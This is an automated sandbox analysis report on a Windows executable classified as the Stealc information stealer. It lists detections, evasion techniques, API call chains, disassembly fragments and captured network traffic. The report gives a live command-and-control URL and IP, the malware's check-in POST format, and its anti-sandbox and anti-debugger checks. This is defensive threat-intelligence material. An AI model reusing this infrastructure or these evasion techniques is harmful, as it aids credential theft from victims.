Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524645
MD5: 9230158d2d15f5f7140b53912347a845
SHA1: 01d78cba09eca8d00ad54454ef652b24321bb00d
SHA256: 403a726fd6b597b2646fb61f309d5e59f8b33be15b697b6cac53686580e9fce1
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2316 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9230158D2D15F5F7140B53912347A845)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara matches
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2316 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2316 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.950000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:01:01.691850+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.950000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpN | Virustotal: Detection: 16%
Source: http://185.215.113.37/p | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpy | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00957240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00968EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00964910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00964570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00963EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------AKEGDAKEHJDHIDHJJDAE
    Content-Disposition: form-data; name="hwid"

    3A060AB3F9603810289448
    ------AKEGDAKEHJDHIDHJJDAE
    Content-Disposition: form-data; name="build"

    doma
    ------AKEGDAKEHJDHIDHJJDAE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00956280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 to Host 185.215.113.37 (same request as listed above; no User-Agent header)
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 to Host 185.215.113.37, Content-Length: 211 (same multipart request as listed above; no User-Agent header)
Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1721406629.000000000061B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/p
Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37=

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D22869
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD1A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA720A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA7A04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D24350
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D20C78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1CD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEBD1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0FEE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1862B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C73FE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D277FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C23F46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1D72E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009545C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: rdaizazf ZLIB complexity 0.9948355098785363
Source: file.exe, 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00968680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00963720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3PI5HDF8.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1821184 > 1048576
Source: file.exe | Static PE information: Raw size of rdaizazf is bigger than: 0x100000 < 0x196800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.950000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rdaizazf:EW;hwyhwwjx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rdaizazf:EW;hwyhwwjx:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb41e should be: 0x1bd025
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: rdaizazf
Source: file.exe | Static PE information: section name: hwyhwwjx
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4E8CF push esi; mov dword ptr [esp], edi | 0_2_00D4E906
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4E8CF push 2B5989ADh; mov dword ptr [esp], ebp | 0_2_00D4E95C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E130CB push ecx; mov dword ptr [esp], eax | 0_2_00E130D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E010DA push 2C96C9B1h; mov dword ptr [esp], esi | 0_2_00E010E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D468B6 push ebx; mov dword ptr [esp], 7CF96FA8h | 0_2_00D468D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D468B6 push ebp; mov dword ptr [esp], eax | 0_2_00D468F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D468B6 push edi; mov dword ptr [esp], esi | 0_2_00D46967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCA0A8 push esi; mov dword ptr [esp], eax | 0_2_00DCA0BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096B035 push ecx; ret | 0_2_0096B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC987B push 1105FB53h; mov dword ptr [esp], eax | 0_2_00DC992E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ebp; mov dword ptr [esp], edx | 0_2_00D1A09D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ecx; mov dword ptr [esp], ebp | 0_2_00D1A0AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push edi; mov dword ptr [esp], eax | 0_2_00D1A10D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ecx; mov dword ptr [esp], 7B4D3346h | 0_2_00D1A18A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ebp; mov dword ptr [esp], esi | 0_2_00D1A1FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ebx; mov dword ptr [esp], esi | 0_2_00D1A21E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push eax; mov dword ptr [esp], 3DBC5BBBh | 0_2_00D1A299
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push edx; mov dword ptr [esp], 3518FB97h | 0_2_00D1A316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push eax; mov dword ptr [esp], ecx | 0_2_00D1A3D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 6837C940h; mov dword ptr [esp], edx | 0_2_00D1A3E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 6D18B101h; mov dword ptr [esp], ebx | 0_2_00D1A4FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 2B579155h; mov dword ptr [esp], ecx | 0_2_00D1A510
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push edx; mov dword ptr [esp], 0202AA06h | 0_2_00D1A594
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 3F97356Dh; mov dword ptr [esp], ebp | 0_2_00D1A5DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 43DEC91Bh; mov dword ptr [esp], edx | 0_2_00D1A62E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push edx; mov dword ptr [esp], ebp | 0_2_00D1A674
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 179B9906h; mov dword ptr [esp], ebp | 0_2_00D1A6EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ecx; mov dword ptr [esp], esi | 0_2_00D1A782
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 65B9DDF7h; mov dword ptr [esp], edi | 0_2_00D1A836
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push ecx; mov dword ptr [esp], eax | 0_2_00D1A8ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1A06B push 1AB29E91h; mov dword ptr [esp], ebp | 0_2_00D1A94D
Source: file.exe | Static PE information: section name: rdaizazf entropy: 7.953372032997779

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB1F3E second address: BB1F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB1F42 second address: BB1811 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2D0B60AF4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007FD2D0B60AECh 0x00000013 jmp 00007FD2D0B60AEFh 0x00000018 push dword ptr [ebp+122D03D5h] 0x0000001e jmp 00007FD2D0B60AF6h 0x00000023 call dword ptr [ebp+122D1BEEh] 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D320Ch], ecx 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 mov ax, cx 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b mov dword ptr [ebp+122D2CC4h], esi 0x00000041 mov dword ptr [ebp+122D364Fh], eax 0x00000047 jnc 00007FD2D0B60AFBh 0x0000004d mov esi, 0000003Ch 0x00000052 clc 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 sub dword ptr [ebp+122D2CC4h], ebx 0x0000005d lodsw 0x0000005f jmp 00007FD2D0B60AEDh 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 cld 0x00000069 jmp 00007FD2D0B60AEAh 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 or dword ptr [ebp+122D320Ch], edi 0x00000078 nop 0x00000079 pushad 0x0000007a je 00007FD2D0B60AECh 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2C50C second address: D2C510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2C510 second address: D2C51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2C51A second address: D2C520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2EB45 second address: D2EC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007FD2D0B60AEEh 0x0000000d jg 00007FD2D0B60AE8h 0x00000013 pushad 0x00000014 popad 0x00000015 nop 0x00000016 mov di, 226Eh 0x0000001a push 00000000h 0x0000001c add dword ptr [ebp+122D2198h], esi 0x00000022 push B6F8BDBDh 0x00000027 jmp 00007FD2D0B60AEDh 0x0000002c add dword ptr [esp], 490742C3h 0x00000033 mov edi, dword ptr [ebp+122D1996h] 0x00000039 push 00000003h 0x0000003b push ecx 0x0000003c mov dword ptr [ebp+122D2D6Dh], eax 0x00000042 pop edx 0x00000043 push 00000000h 0x00000045 and di, 6AC9h 0x0000004a push 00000003h 0x0000004c jmp 00007FD2D0B60AF3h 0x00000051 call 00007FD2D0B60AE9h 0x00000056 push eax 0x00000057 jmp 00007FD2D0B60AF9h 0x0000005c pop eax 0x0000005d push eax 0x0000005e jmp 00007FD2D0B60AF0h 0x00000063 mov eax, dword ptr [esp+04h] 0x00000067 push edi 0x00000068 jng 00007FD2D0B60AECh 0x0000006e pop edi 0x0000006f mov eax, dword ptr [eax] 0x00000071 push esi 0x00000072 jmp 00007FD2D0B60AF3h 0x00000077 pop esi 0x00000078 mov dword ptr [esp+04h], eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f push edi 0x00000080 pop edi 0x00000081 jg 00007FD2D0B60AE6h 0x00000087 popad 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2EC1A second address: D2EC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2ECC3 second address: D2ED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD2D0B60AE8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sub ecx, dword ptr [ebp+122D2E2Eh] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD2D0B60AE8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push ecx 0x00000046 mov dword ptr [ebp+122D2B35h], ebx 0x0000004c pop edx 0x0000004d js 00007FD2D0B60AF1h 0x00000053 jmp 00007FD2D0B60AEBh 0x00000058 sub esi, 7CE8B8C5h 0x0000005e push 2FAB2272h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2ED3C second address: D2ED53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2ED53 second address: D2ED5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD2D0B60AE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2ED5D second address: D2EDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2FAB22F2h 0x0000000f cld 0x00000010 push 00000003h 0x00000012 js 00007FD2D0DFA0C7h 0x00000018 stc 0x00000019 xor dword ptr [ebp+122D33CDh], ebx 0x0000001f push 00000000h 0x00000021 jmp 00007FD2D0DFA0D0h 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FD2D0DFA0C8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 jmp 00007FD2D0DFA0D5h 0x00000047 and cl, FFFFFF92h 0x0000004a push 896B4379h 0x0000004f push eax 0x00000050 push edx 0x00000051 